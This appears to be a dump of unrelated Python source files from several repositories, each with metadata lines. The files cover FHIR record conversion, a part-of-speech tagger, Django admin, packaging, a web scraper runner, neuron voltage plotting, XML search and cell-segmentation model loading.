    """ Returns a FHIR Encounter resource entry and reference.

    Collects reported symptoms as contained Condition resources and
    diagnosis references, attaches the non-tract location entries plus the
    fixed 'swabNSend' site, and returns (None, None) when the record has no
    enrollment date.
    """
    def grab_symptom_keys(key: str) -> Optional[Match[str]]:
        # Keep only checked REDCap checkbox fields named symptoms___<n>.
        if record[key] != '':
            return re.match('symptoms___[0-9]{1,3}$', key)
        else:
            return None
    def build_conditions_list(symptom_key: str) -> dict:
        return create_resource_condition(record[symptom_key], patient_reference)
    def build_diagnosis_list(symptom_key: str) -> Optional[dict]:
        mapped_symptom = map_symptom(record[symptom_key])
        if not mapped_symptom:
            return None
        # '#'-prefixed reference points at the contained Condition resource.
        return { "condition": { "reference": f"#{mapped_symptom}" } }
    def build_locations_list(location: dict) -> dict:
        return {
            "location": create_reference(
                reference_type = "Location",
                reference = location["fullUrl"]
            )
        }
    def non_tract_locations(resource: dict):
        # Tract entries are referenced indirectly via the address location,
        # so they are excluded from the encounter's own location list.
        return bool(resource) \
            and resource['resource']['identifier'][0]['system'] != f"{INTERNAL_SYSTEM}/location/tract"
    symptom_keys = list(filter(grab_symptom_keys, record))
    contained = list(filter(None, map(build_conditions_list, symptom_keys)))
    diagnosis = list(filter(None, map(build_diagnosis_list, symptom_keys)))
    encounter_identifier = create_identifier(
        system = f"{INTERNAL_SYSTEM}/encounter",
        value = f"{REDCAP_URL}{PROJECT_ID}/{record['record_id']}"
    )
    encounter_class_coding = create_coding(
        system = "http://terminology.hl7.org/CodeSystem/v3-ActCode",
        code = "HH"
    )
    encounter_date = record['enrollment_date']
    if not encounter_date:
        return None, None
    non_tracts = list(filter(non_tract_locations, locations))
    non_tract_references = list(map(build_locations_list, non_tracts))
    # Site for all swab 'n send Encounters is 'swabNSend'
    site_reference = {
        "location": create_reference(
            reference_type = "Location",
            identifier = create_identifier(f"{INTERNAL_SYSTEM}/site", 'swabNSend')
        )
    }
    non_tract_references.append(site_reference)
    encounter_resource = create_encounter_resource(
        encounter_source = create_redcap_uri(record),
        encounter_identifier = [encounter_identifier],
        encounter_class = encounter_class_coding,
        encounter_date = encounter_date,
        patient_reference = patient_reference,
        location_references = non_tract_references,
        diagnosis = diagnosis,
        contained = contained
    )
    return create_entry_and_reference(encounter_resource, "Encounter")
def create_resource_condition(symptom_name: str, patient_reference: dict) -> Optional[dict]:
    """ Returns a FHIR Condition resource.

    Returns None when *symptom_name* has no mapping in map_symptom().  The
    resource id is the mapped symptom name so diagnosis entries can refer
    to it with a '#<name>' contained-resource reference.
    """
    mapped_symptom_name = map_symptom(symptom_name)
    if not mapped_symptom_name:
        return None
    # XXX TODO: Define this as a TypedDict when we upgrade from Python 3.6 to
    # 3.8.  Until then, there's no reasonable way to type this data structure
    # better than Any.
    #   -trs, 24 Oct 2019
    condition: Any = {
        "resourceType": "Condition",
        "id": mapped_symptom_name,
        "code": {
            "coding": [
                {
                    "system": f"{INTERNAL_SYSTEM}/symptom",
                    "code": mapped_symptom_name
                }
            ]
        },
        "subject": patient_reference
    }
    return condition
def create_specimen(record: dict, patient_reference: dict) -> tuple:
    """ Returns a FHIR Specimen resource entry and reference.

    Returns (None, None) when no barcode can be determined from the record.
    """
    def specimen_barcode(record: Any) -> str:
        """
        Given a REDCap *record*, returns the barcode or corrected barcode if it
        exists.
        """
        # Prefer the scanned return barcode, then the pre-scan barcode,
        # then the manually entered tube barcode.
        barcode = record['return_utm_barcode'] or record['pre_scan_barcode']
        if not barcode:
            barcode = record['utm_tube_barcode']
        # NOTE(review): the original code also read record['reenter_barcode']
        # into an unused local that was never compared against *barcode*; the
        # dead read has been removed.  Confirm whether a cross-check between
        # the two entries was originally intended.
        if record['check_barcodes'] == "No":
            # TODO: Figure out why 'corrected_barcode' doesn't always exist?
            barcode = record.get('corrected_barcode')
        return barcode
    barcode = specimen_barcode(record)
    if not barcode:
        LOG.warning("Could not create Specimen Resource due to lack of barcode.")
        return None, None
    specimen_identifier = create_identifier(
        system = f"{INTERNAL_SYSTEM}/sample",
        value = barcode
    )
    # YYYY-MM-DD in REDCap
    collected_time = record['collection_date'] or None
    # YYYY-MM-DD
    received_time = record['samp_process_date'] or None
    specimen_type = 'NSECR'  # Nasal swab.  TODO we may want shared mapping function
    specimen_resource = create_specimen_resource(
        [specimen_identifier], patient_reference, specimen_type, received_time, collected_time
    )
    return create_entry_and_reference(specimen_resource, "Specimen")
def create_questionnaire_response(record: dict, patient_reference: dict,
                                  encounter_reference: dict) -> Optional[dict]:
    """ Returns a FHIR Questionnaire Response resource entry.

    NOTE: mutates *record* in place ('race', 'age', 'age_months' are
    overwritten by the pre-processing below).  Returns None when no
    answerable items are found.
    """
    def create_custom_coding_key(coded_question: str, record: dict) -> Optional[List]:
        """
        Handles the 'race' edge case by combining "select all that apply"-type
        responses into one list.
        """
        coded_keys = list(filter(lambda r: grab_coding_keys(coded_question, r), record))
        coded_names = list(map(lambda k: record[k], coded_keys))
        if coded_question == 'race':
            return race(coded_names)
        return None
    def grab_coding_keys(coded_question: str, key: str) -> Optional[Match[str]]:
        if record[key] == '':
            return None
        return re.match(f'{coded_question}___[0-9]+$', key)
    def build_questionnaire_items(question: str) -> Optional[dict]:
        # Closes over the loop variable `category` below; safe because it is
        # only called (via map) within the same loop iteration.
        return questionnaire_item(record, question, category)
    coding_questions = [
        'race'
    ]
    boolean_questions = [
        'hispanic',
        'travel_states',
        'travel_countries',
    ]
    integer_questions = [
        'age',
        'age_months',
    ]
    string_questions = [
        'education',
        'samp_process_date',
    ]
    question_categories = {
        'valueCoding': coding_questions,
        'valueBoolean': boolean_questions,
        'valueInteger': integer_questions,
        'valueString': string_questions,
    }
    # Do some pre-processing
    record['race'] = create_custom_coding_key('race', record)
    record['age'] = age_ceiling(int(record['age']))
    record['age_months'] = age_ceiling(int(record['age_months']) / 12) * 12
    items: List[dict] = []
    for category in question_categories:
        category_items = list(map(build_questionnaire_items, question_categories[category]))
        for item in category_items:
            if item:
                items.append(item)
    # Handle edge cases
    vaccine_item = vaccine(record)
    if vaccine_item:
        items.append(vaccine_item)
    if items:
        questionnaire_reseponse_resource = create_questionnaire_response_resource(
            patient_reference, encounter_reference, items
        )
        full_url = generate_full_url_uuid()
        return create_resource_entry(questionnaire_reseponse_resource, full_url)
    return None
def questionnaire_item(record: dict, question_id: str, response_type: str) -> Optional[dict]:
    """ Creates a QuestionnaireResponse internal item from a REDCap record.

    *response_type* selects the casting function ('valueCoding',
    'valueInteger', 'valueBoolean' or 'valueString').  Returns None when the
    response casts to no usable answers.
    """
    response = record[question_id]
    def cast_to_coding(string: str):
        """ Currently the only QuestionnaireItem we code is race. """
        return create_coding(
            system = f"{INTERNAL_SYSTEM}/race",
            code = string,
        )
    def cast_to_string(string: str) -> Optional[str]:
        if string != '':
            return string
        return None
    def cast_to_integer(string: str) -> Optional[int]:
        try:
            return int(string)
        except ValueError:
            return None
    def cast_to_boolean(string: str) -> Optional[bool]:
        if string == 'Yes':
            return True
        elif re.match(r'^No($|,[\w\s\'\.]*)$', string):  # Starts with "No", has optional comma and text
            return False
        return None
    def build_response_answers(response: Union[str, List]) -> List:
        answers = []
        if not isinstance(response, list):
            response = [response]
        for item in response:
            type_casted_item = casting_functions[response_type](item)
            # cast_to_boolean can return False, so must be `is not None`
            if type_casted_item is not None:
                answers.append({ response_type: type_casted_item })
        return answers
    casting_functions: Mapping[str, Callable[[str], Any]] = {
        'valueCoding': cast_to_coding,
        'valueInteger': cast_to_integer,
        'valueBoolean': cast_to_boolean,
        'valueString': cast_to_string,
    }
    answers = build_response_answers(response)
    if answers:
        return create_questionnaire_response_item(question_id, answers)
    return None
def vaccine(record: Any) -> Optional[dict]:
    """
    For a given *record*, return a questionnaire response item with the vaccine
    response(s) encoded.

    Returns None when the vaccine status cannot be mapped.  A vaccination
    date is only appended for a positive vaccine status.
    """
    vaccine_status = map_vaccine(record["vaccine"])
    if vaccine_status is None:
        return None
    answers: List[Dict[str, Any]] = [{ 'valueBoolean': vaccine_status }]
    date = vaccine_date(record)
    if vaccine_status and date:
        answers.append({ 'valueDate': date })
    return create_questionnaire_response_item('vaccine', answers)
def vaccine_date(record: dict) -> Optional[str]:
    """ Converts a vaccination date to 'YYYY' or 'YYYY-MM' format.

    Returns None when the year is missing or unknown.  An unknown — or
    blank — month degrades gracefully to a year-only string.
    """
    year = record['vaccine_year']
    month = record['vaccine_1']
    if year in ('', 'Do not know'):
        return None
    # A blank month previously raised ValueError in strptime('%B %Y');
    # treat it like 'Do not know' and fall back to the year-only format.
    if month in ('', 'Do not know'):
        return datetime.strptime(year, '%Y').strftime('%Y')
    return datetime.strptime(f'{month} {year}', '%B %Y').strftime('%Y-%m')
def residence_census_tract(db: DatabaseSession, lat_lng: Tuple[float, float],
                           housing_type: str) -> Optional[dict]:
    """
    Creates a new Location Resource for the census tract containing the given
    *lat_lng* coordinates and associates it with the given *housing_type*.

    Returns None (with a warning) when no tract is found for the point.
    """
    location = location_lookup(db, lat_lng, 'tract')
    if location and location.identifier:
        return create_location(
            f"{INTERNAL_SYSTEM}/location/tract", location.identifier, housing_type
        )
    else:
        LOG.warning("No census tract found for given location.")
        return None
| 2.109375 | 2 |
main/find_pos.py | TechnicallyMay/mad_libs_generator | 0 | 12757408 | import nltk
import re
import string
from collections import defaultdict
nltk.download("punkt")
nltk.download('averaged_perceptron_tagger')
def tag_pos(text):
    """Tokenize *text*, POS-tag it, strip punctuation, and group words by tag.

    Returns the defaultdict produced by sort_by_pos(): {pos_tag: [words]}.
    """
    tokens = nltk.word_tokenize(text)
    tagged = nltk.pos_tag(tokens)
    cleaned = remove_punctuation(tagged)
    # Renamed from `sorted`, which shadowed the builtin of the same name.
    grouped = sort_by_pos(cleaned)
    return grouped
def remove_punctuation(tagged_text):
    """Lowercase each tagged word and strip all ASCII punctuation from it.

    Takes and returns a list of (word, pos_tag) tuples.
    """
    # re.escape makes every punctuation character literal inside the class.
    # The previous '[%s]' % string.punctuation only parsed because the '\\'
    # in string.punctuation happened to escape the ']' that follows it.
    pattern = re.compile('[%s]' % re.escape(string.punctuation))
    return [(pattern.sub('', word).lower(), pos) for word, pos in tagged_text]
def sort_by_pos(tokens):
    """Group words longer than 2 characters into lists keyed by POS tag.

    Takes (word, pos_tag) tuples; returns a defaultdict(list).  (An unused
    `punct = string.punctuation` local has been removed.)
    """
    parts_of_speech = defaultdict(list)
    for word, tag in tokens:
        # Very short tokens carry little mad-lib value; skip them.
        if len(word) > 2:
            parts_of_speech[tag].append(word)
    return parts_of_speech
| 3.125 | 3 |
bestmoments/admin.py | randomowo/randomowo.ru | 0 | 12757409 | """
"""
from django.contrib import admin
from bestmoments.models import BestImage
from bestmoments.models import WebmVideo
class BestImageAdmin(admin.ModelAdmin):
    """
    Admin configuration for BestImage: show only the image column in the
    change list.
    """
    list_display = ["image"]
class WebmVideoAdmin(admin.ModelAdmin):
    """
    Admin configuration for WebmVideo: show only the video column in the
    change list.
    """
    list_display = ["video"]
# Register both models with the default admin site.
admin.site.register(BestImage, BestImageAdmin)
admin.site.register(WebmVideo, WebmVideoAdmin)
| 1.789063 | 2 |
setup.py | grodriguezl/intelmq-webinput-csv | 0 | 12757410 | <reponame>grodriguezl/intelmq-webinput-csv
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (c) 2017-2018 nic.at GmbH <<EMAIL>>
# SPDX-License-Identifier: AGPL-3.0
import os
from setuptools import find_packages, setup
# Example config files installed outside the package tree.
DATA = [
    ('/opt/intelmq/etc/examples',
     ['intelmq_webinput_csv/etc/webinput_csv.conf',
      ],
     ),
]
# Single-source the version: executing version.py binds __version__ here.
exec(open(os.path.join(os.path.dirname(__file__),
          'intelmq_webinput_csv/version.py')).read())  # defines __version__
# Rewrite relative docs links so they work on PyPI/GitHub.
with open(os.path.join(os.path.dirname(__file__), 'README.rst')) as handle:
    README = handle.read().replace('<docs/',
                                   '<https://github.com/certat/intelmq-webinput-csv/blob/master/docs/')
# Collect every package subdirectory as a glob for package_data
# (only the directory names `r` are used; `d` and `f` are unused).
folders = []
for r, d, f in os.walk(os.path.join(os.path.dirname(__file__),'intelmq_webinput_csv')):
    folders.append(r + '/*')
setup(
    name='intelmq_webinput_csv',
    version=__version__,
    maintainer='<NAME>',
    maintainer_email='<EMAIL>',
    install_requires=[
        'Flask',
        'intelmq',
    ],
    test_suite='intelmq_webinput_csv.tests',
    packages=find_packages(),
    package_data={
        'intelmq_webinput_csv': folders
    },
    include_package_data=True,
    url='https://github.com/certat/intelmq_webinput_csv/',
    license='AGPLv3 and MIT and OFL-1.1',
    description='This is a Flask-based web interface allowing the user to '
                'insert data into intelmq\'s pipelines interactively with '
                'preview from the parser.',
    long_description=README,
    classifiers=[
        'Development Status :: 3 - Alpha',
        'Environment :: Web Environment',
        'Framework :: Flask',
        'Intended Audience :: Information Technology',
        'Intended Audience :: System Administrators',
        'Intended Audience :: Telecommunications Industry',
        'License :: OSI Approved :: GNU Affero General Public License v3',
        'License :: OSI Approved :: MIT License',
        'Operating System :: POSIX :: Linux',
        'Programming Language :: Python',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3 :: Only',
        'Programming Language :: Python :: Implementation :: CPython',
        'Topic :: Security',
    ],
    keywords='incident handling cert csirt',
    data_files=DATA,
    entry_points={
        'console_scripts': [
            'intelmq_webinput_csv=intelmq_webinput_csv.bin.backend:main',
        ],
    },
)
| 1.609375 | 2 |
newss.py | windn19/Svod1 | 0 | 12757411 | <filename>newss.py
import os
from cleaning import clear_file
# Language editions to scrape; iterating the list directly replaces the
# previous hard-coded range(4), which would silently skip (or crash on)
# entries if this list changed length.
lands = ['ru', 'uk', 'fr', 'de']
for land in lands:
    # Reset the output file, then run the per-language scrapy spider.
    clear_file(f'data/data_{land}.json')
    # NOTE(review): interpreter is hard-coded as python3.7 here and below.
    os.system(f'python3.7 -m scrapy runspider auto_{land}.py --output=data/data_{land}.json -L WARNING')
    print(f'{land} -- ok')
os.system('python3.7 render.py')
os.system('xdg-open index.html')
| 2.5 | 2 |
crawl_data.py | Sharad24/NeurIPS2021Datasets-OpenReviewData | 493 | 12757412 | <gh_stars>100-1000
import numpy as np
import h5py
import string
from util import crawl_meta
import time
CRAWL_DATA = True       # NOTE(review): defined but not read in this script — confirm
AFTER_DECISION = False  # NOTE(review): likewise unused here
CRAWL_REVIEW = True     # forwarded to crawl_meta() below
# Get the meta data; the output file name is timestamped at run time.
meta_list = crawl_meta(
    meta_hdf5=None,
    write_meta_name='data_{}.hdf5'.format(time.strftime("%Y%m%d%H%M%S")),
    crawl_review=CRAWL_REVIEW)
# Count withdrawn or desk-rejected submissions for the summary line.
num_withdrawn = len([m for m in meta_list if m.withdrawn or m.desk_reject])
print('Number of submissions: {} (withdrawn/desk reject submissions: {})'.format(
    len(meta_list), num_withdrawn))
| 2.640625 | 3 |
python/dataingest/grammar/bp/python_parse_api.py | jiportilla/ontology | 0 | 12757413 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
import os
import pandas as pd
from pandas import DataFrame
from tabulate import tabulate
from base import BaseObject
class PythonParseAPI(BaseObject):
    """ API (Orchestrator) for Python Dependency Parsing

    process() parses all Python files under $CODE_BASE/workspace and writes
    three collections (source, internal imports, external imports);
    load(date) reads those collections back as DataFrames via a facade.
    """
    def __init__(self,
                 is_debug: bool = False):
        """
        Created:
            6-Dec-2019
            <EMAIL>
            *   https://github.ibm.com/GTS-CDO/unstructured-analytics/issues/1535
        Updated:
            24-Dec-2019
            <EMAIL>
            *   refactored in pursuit of
                https://github.ibm.com/GTS-CDO/unstructured-analytics/issues/1637#issuecomment-16802191
            *   also refactored in pursuit of
                https://github.ibm.com/GTS-CDO/unstructured-analytics/issues/1642#issuecomment-16802836
        :param is_debug: enable verbose debug logging
        """
        BaseObject.__init__(self, __name__)
        self._is_debug = is_debug
        # Raises KeyError if CODE_BASE is not set in the environment.
        self._base_path = os.environ["CODE_BASE"]
    def _to_file(self,
                 df: DataFrame,
                 collection_type: str) -> None:
        """Persist *df* under a generated collection name for *collection_type*."""
        # Imports deferred, presumably to avoid circular imports — confirm.
        from dataingest.grammar.dmo import CollectionNameGenerator
        from dataingest.grammar.svc import PerformPythonTransformation
        gen_name = CollectionNameGenerator(is_debug=self._is_debug)
        collection_name = gen_name.process(collection_type)
        PerformPythonTransformation(df_parse=df,
                                    is_debug=self._is_debug,
                                    collection_name=collection_name).process()
    def process(self):
        """Parse all Python files under $CODE_BASE/workspace and persist results."""
        from dataingest.grammar.svc import ParsePythonFiles
        from dataingest.grammar.svc import ParsePythonImports
        from dataingest.grammar.dmo import PythonDirectoryLoader
        directory_path = f"{self._base_path}/workspace"
        files = PythonDirectoryLoader(is_debug=self._is_debug,
                                      directory_path=directory_path).process()
        df_files = ParsePythonFiles(files=files,
                                    is_debug=self._is_debug).process()
        if df_files is None:
            self.logger.warning("No Results Found")
            return
        d_imports = ParsePythonImports(files=files,
                                       df_files=df_files,
                                       is_debug=self._is_debug).process()
        # Persist the three collections: source plus the import split.
        self._to_file(df_files, "src")
        self._to_file(d_imports["internal"], "int-import")
        self._to_file(d_imports["external"], "ext-import")
    def load(self,
             date: str):
        """Return a facade exposing the collections written for *date*.

        Usage: load(date).source(), load(date).imports().internal(),
        load(date).imports().external().
        """
        def _input_path(file_name: str) -> str:
            return os.path.join(os.environ["CODE_BASE"],
                                "resources/output/transform",
                                file_name)
        def _to_dataframe(collection_type: str,
                          input_path: str) -> DataFrame:
            df = pd.read_csv(input_path, sep='\t', encoding='utf-8')
            if self._is_debug:
                # NOTE(review): df.sample(3) requires at least 3 rows —
                # smaller collections would raise here; confirm intent.
                self.logger.debug('\n'.join([
                    f"Imported {collection_type} Collection",
                    f"\tTotal Records: {len(df)}",
                    f"\tInput Path: {input_path}",
                    tabulate(df.sample(3), tablefmt='psql', headers='keys')]))
            return df
        class Facade(object):
            @staticmethod
            def imports():
                class ImportsFacade(object):
                    @staticmethod
                    def internal() -> DataFrame:
                        input_path = _input_path(f"parse_unstrut-int-import_{date}.csv")
                        return _to_dataframe("Internal Imports", input_path)
                    @staticmethod
                    def external() -> DataFrame:
                        input_path = _input_path(f"parse_unstrut-ext-import_{date}.csv")
                        return _to_dataframe("External Imports", input_path)
                return ImportsFacade()
            @staticmethod
            def source() -> DataFrame:
                input_path = _input_path(f"parse_unstrut-src_{date}.csv")
                return _to_dataframe("Source", input_path)
        return Facade()
def main():
    """Entry point: run the full Python-parsing pipeline non-verbosely."""
    PythonParseAPI(is_debug=False).process()
# plac builds the CLI from main()'s (empty) signature.
if __name__ == "__main__":
    import plac
    plac.call(main)
| 2.171875 | 2 |
5_neurons_phase_reset/xpp_to_py.py | helene-todd/XPPAUT_code | 0 | 12757414 | <reponame>helene-todd/XPPAUT_code
import matplotlib.pyplot as plt
from matplotlib import cm, rcParams
from matplotlib.ticker import FormatStrFormatter
import numpy as np
import math as math
import random as rand
import os
import csv
rcParams.update({'figure.autolayout': True})
# Colour palette, one colour per neuron voltage trace.
c = ['#aa3863', '#d97020', '#ef9f07', '#449775', '#3b7d86']
# NOTE(review): only the *_plot1 lists are ever filled below; the
# *_plot2 / *_plot3 lists are unused leftovers from an earlier version.
times_plot1, times_plot2, times_plot3 = [], [], []
V1_plot1, V1_plot2, V1_plot3 = [], [], []
V2_plot1, V2_plot2, V2_plot3 = [], [], []
V3_plot1, V3_plot2, V3_plot3 = [], [], []
V4_plot1, V4_plot2, V4_plot3 = [], [], []
V5_plot1, V5_plot2, V5_plot3 = [], [], []
I_plot1, I_plot2, I_plot3 = [], [], []
# Spike threshold and reset voltage of the integrate-and-fire model.
Vth = 1
Vr = 0
fig, ax = plt.subplots(2, 1, figsize=(16,6), sharey='row')
# Load the XPPAUT output: columns are t, V1..V5, I (space-separated),
# keeping only the 20 <= t <= 52.5 window.
with open('synchro.dat', newline='') as file:
    datareader = csv.reader(file, delimiter=' ')
    for row in datareader:
        if float(row[0]) >= 20 and float(row[0]) <= 52.5 :
            times_plot1.append(float(row[0]))
            V1_plot1.append(float(row[1]))
            V2_plot1.append(float(row[2]))
            V3_plot1.append(float(row[3]))
            V4_plot1.append(float(row[4]))
            V5_plot1.append(float(row[5]))
            I_plot1.append(float(row[6]))
# Top panel: injected current; the constant line uses the first sample
# as the (presumed constant) current of neurons 3-5 -- TODO confirm.
ax[0].plot(times_plot1, I_plot1, alpha=0.75, color='red', linestyle='-', label='Neurons 1 & 2')
ax[0].plot(times_plot1, I_plot1[0]*np.ones(len(times_plot1)), alpha=0.75, color='blue', linestyle='-', label='Neurons 3, 4 & 5')
# Bottom panel: the five membrane-potential traces.
ax[1].plot(times_plot1, V1_plot1, alpha=0.75, color=c[0], linestyle='-', label='$V_1$')
ax[1].plot(times_plot1, V2_plot1, alpha=0.75, color=c[1], linestyle='-', label='$V_2$')
ax[1].plot(times_plot1, V3_plot1, alpha=0.75, color=c[2], linestyle='-', label='$V_3$')
ax[1].plot(times_plot1, V4_plot1, alpha=0.75, color=c[3], linestyle='-', label='$V_4$')
ax[1].plot(times_plot1, V5_plot1, alpha=0.75, color=c[4], linestyle='-', label='$V_5$')
# A spike occurs iff there was a reset: detect jumps larger than half the
# threshold-to-reset distance between consecutive samples.
# Plot 1
spike_times_V1_plot1 = [times_plot1[i] for i in range(1,len(V1_plot1)) if abs(V1_plot1[i]-V1_plot1[i-1]) > (Vth-Vr)/2]
spike_times_V2_plot1 = [times_plot1[i] for i in range(1,len(V2_plot1)) if abs(V2_plot1[i]-V2_plot1[i-1]) > (Vth-Vr)/2]
spike_times_V3_plot1 = [times_plot1[i] for i in range(1,len(V3_plot1)) if abs(V3_plot1[i]-V3_plot1[i-1]) > (Vth-Vr)/2]
spike_times_V4_plot1 = [times_plot1[i] for i in range(1,len(V4_plot1)) if abs(V4_plot1[i]-V4_plot1[i-1]) > (Vth-Vr)/2]
spike_times_V5_plot1 = [times_plot1[i] for i in range(1,len(V5_plot1)) if abs(V5_plot1[i]-V5_plot1[i-1]) > (Vth-Vr)/2]
# Draw a vertical tick above threshold at every detected spike time.
for t in spike_times_V1_plot1:
    ax[1].plot([t, t], [Vth, Vth+0.5], alpha=0.75, color=c[0])
for t in spike_times_V2_plot1:
    ax[1].plot([t, t], [Vth, Vth+0.5], alpha=0.75, color=c[1])
for t in spike_times_V3_plot1:
    ax[1].plot([t, t], [Vth, Vth+0.5], alpha=0.75, color=c[2])
for t in spike_times_V4_plot1:
    ax[1].plot([t, t], [Vth, Vth+0.5], alpha=0.75, color=c[3])
for t in spike_times_V5_plot1:
    ax[1].plot([t, t], [Vth, Vth+0.5], alpha=0.75, color=c[4])
ax[1].set_xlabel('Time ($10^{-2}$ seconds)', size=10)
ax[1].set_ylabel('Voltage $V_k, k \in \{1,..,5\}$', size=10)
ax[0].set_ylabel('Current $I$', size=10)
fig.suptitle('Network of 5 electrically coupled neurons, $\\beta=0.1$ and $\gamma=0.1$', size=12)
ax[0].legend()
ax[1].legend(bbox_to_anchor=(1, 1))
plt.savefig('synchrony.svg')
plt.show()
| 2.0625 | 2 |
xml-element-search/search.py | ravenberserk/python-utility-scripts | 0 | 12757415 | <reponame>ravenberserk/python-utility-scripts<filename>xml-element-search/search.py
#!/usr/bin/env python
"""Script que permitira buscar un elemento en un listado de ficheros."""
__author__ = "<NAME>"
__version__ = "1.0.0"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "Production"
import xml.etree.ElementTree as ET
import glob
def has_attibutes(button):
    """Return True when *button* carries an 'action' attribute."""
    attributes = button.attrib
    return 'action' in attributes
def search_in_file(tree_root):
    """Recursively collect commandButton elements lacking an 'action' attribute.

    Non-button children are descended into; buttons that already define an
    'action' are neither collected nor descended into.
    """
    found = []
    if tree_root:
        for element in tree_root:
            if 'commandButton' not in element.tag:
                # Container element: recurse into its subtree.
                found.extend(search_in_file(element))
            elif 'action' not in element.attrib:
                found.append(element)
    return found
def get_files(root_path):
    """Lazily yield the path of every .xml file beneath *root_path*."""
    pattern = root_path + '/**/*.xml'
    return glob.iglob(pattern, recursive=True)
def main():
    """Scan XML pages under 'source' and report action-less buttons per page."""
    pages_with_buttons = {}
    for page in get_files('source'):
        buttons = search_in_file(ET.parse(page).getroot())
        if buttons:
            # Keep only the file name, stripping the Windows-style path.
            page_name = page[page.rfind('\\') + 1::]
            pages_with_buttons[page_name] = buttons
    for page_name, buttons in pages_with_buttons.items():
        print('Page: {} - Buttons: {}'.format(page_name, len(buttons)))
# Run the scan only when executed as a script, not on import.
if __name__ == '__main__':
    main()
| 2.8125 | 3 |
hpacellseg/cellsegmentator.py | p4rallax/HPA-Cell-Segmentation | 0 | 12757416 | """Package for loading and running the nuclei and cell segmentation models programmaticly."""
import os
import sys
import cv2
import imageio
import numpy as np
import torch
import torch.nn
import torch.nn.functional as F
from skimage import transform, util
from hpacellseg.constants import (MULTI_CHANNEL_CELL_MODEL_URL,
NUCLEI_MODEL_URL, TWO_CHANNEL_CELL_MODEL_URL)
from hpacellseg.utils import download_with_url
NORMALIZE = {"mean": [124 / 255, 117 / 255, 104 / 255], "std": [1 / (0.0167 * 255)] * 3}
class CellSegmentator(object):
    """Uses pretrained DPN-Unet models to segment cells from images."""
    def __init__(
        self,
        nuclei_model="./nuclei_model.pth",
        cell_model="./cell_model.pth",
        model_width_height=None,
        device="cuda",
        multi_channel_model=True,
        return_without_scale_restore=False,
        scale_factor=0.25,
        padding=False
    ):
        """Load the nuclei and cell models, downloading checkpoints if absent.

        nuclei_model / cell_model: checkpoint path (downloaded when missing)
            or an already-loaded torch model object.
        model_width_height: if set, inputs are resized to this square size
            instead of being rescaled by ``scale_factor``.
        device: "cuda", "cpu" or an explicit "cuda:N" string; falls back to
            "cpu" when no GPU is available.
        multi_channel_model: selects the 3-channel cell checkpoint instead
            of the 2-channel one.
        return_without_scale_restore: if True, predictions stay at model
            resolution instead of being resized back to the input shape.
        scale_factor: rescale factor used when ``model_width_height`` is None.
        padding: reflect-pad scaled inputs (see ``_pad``).
        """
        if device != "cuda" and device != "cpu" and "cuda" not in device:
            raise ValueError(f"{device} is not a valid device (cuda/cpu)")
        if device != "cpu":
            try:
                assert torch.cuda.is_available()
            except AssertionError:
                print("No GPU found, using CPU.", file=sys.stderr)
                device = "cpu"
        self.device = device
        if isinstance(nuclei_model, str):
            if not os.path.exists(nuclei_model):
                print(
                    f"Could not find {nuclei_model}. Downloading it now",
                    file=sys.stderr,
                )
                download_with_url(NUCLEI_MODEL_URL, nuclei_model)
            nuclei_model = torch.load(
                nuclei_model, map_location=torch.device(self.device)
            )
        if isinstance(nuclei_model, torch.nn.DataParallel) and device == "cpu":
            # DataParallel wrappers cannot run on CPU; unwrap the inner module.
            nuclei_model = nuclei_model.module
        self.nuclei_model = nuclei_model.to(self.device)
        self.multi_channel_model = multi_channel_model
        if isinstance(cell_model, str):
            if not os.path.exists(cell_model):
                print(
                    f"Could not find {cell_model}. Downloading it now", file=sys.stderr
                )
                if self.multi_channel_model:
                    download_with_url(MULTI_CHANNEL_CELL_MODEL_URL, cell_model)
                else:
                    download_with_url(TWO_CHANNEL_CELL_MODEL_URL, cell_model)
            cell_model = torch.load(cell_model, map_location=torch.device(self.device))
        self.cell_model = cell_model.to(self.device)
        self.model_width_height = model_width_height
        self.return_without_scale_restore = return_without_scale_restore
        self.scale_factor = scale_factor
        self.padding = padding
    def _image_conversion(self, images):
        """Validate the (microtubule, ER, nuclei) inputs and stack channels.

        ``images`` is a 3-tuple of lists (file paths or numpy arrays).  The
        ER list is required for the multi-channel model and must be None for
        the two-channel one (a zero-filled channel is substituted).  Returns
        a list of H x W x 3 arrays ordered (microtubule, ER, nuclei).
        """
        microtubule_imgs, er_imgs, nuclei_imgs = images
        if self.multi_channel_model:
            if not isinstance(er_imgs, list):
                raise ValueError("Please speicify the image path(s) for er channels!")
        else:
            if not er_imgs is None:
                raise ValueError(
                    "second channel should be None for two channel model predition!"
                )
        if not isinstance(microtubule_imgs, list):
            raise ValueError("The microtubule images should be a list")
        if not isinstance(nuclei_imgs, list):
            raise ValueError("The microtubule images should be a list")
        if er_imgs:
            if not len(microtubule_imgs) == len(er_imgs) == len(nuclei_imgs):
                raise ValueError("The lists of images needs to be the same length")
        else:
            if not len(microtubule_imgs) == len(nuclei_imgs):
                raise ValueError("The lists of images needs to be the same length")
        if not all(isinstance(item, np.ndarray) for item in microtubule_imgs):
            # Inputs are paths: expand and read them from disk.
            microtubule_imgs = [
                os.path.expanduser(item) for _, item in enumerate(microtubule_imgs)
            ]
            nuclei_imgs = [
                os.path.expanduser(item) for _, item in enumerate(nuclei_imgs)
            ]
            microtubule_imgs = list(
                map(lambda item: imageio.imread(item), microtubule_imgs)
            )
            nuclei_imgs = list(map(lambda item: imageio.imread(item), nuclei_imgs))
            if er_imgs:
                er_imgs = [os.path.expanduser(item) for _, item in enumerate(er_imgs)]
                er_imgs = list(map(lambda item: imageio.imread(item), er_imgs))
        if not er_imgs:
            # Two-channel model: substitute an all-zero ER channel.
            er_imgs = [
                np.zeros(item.shape, dtype=item.dtype)
                for _, item in enumerate(microtubule_imgs)
            ]
        cell_imgs = list(
            map(
                lambda item: np.dstack((item[0], item[1], item[2])),
                list(zip(microtubule_imgs, er_imgs, nuclei_imgs)),
            )
        )
        return cell_imgs
    def _pad(self, image):
        """Reflect-pad ``image`` so both spatial sides exceed a multiple of 32.

        Records the pre-pad shape in ``self.scaled_shape`` so that
        ``_restore_scaling`` can crop the padding off again.
        """
        rows, cols = image.shape[:2]
        self.scaled_shape = rows, cols
        img_pad= cv2.copyMakeBorder(
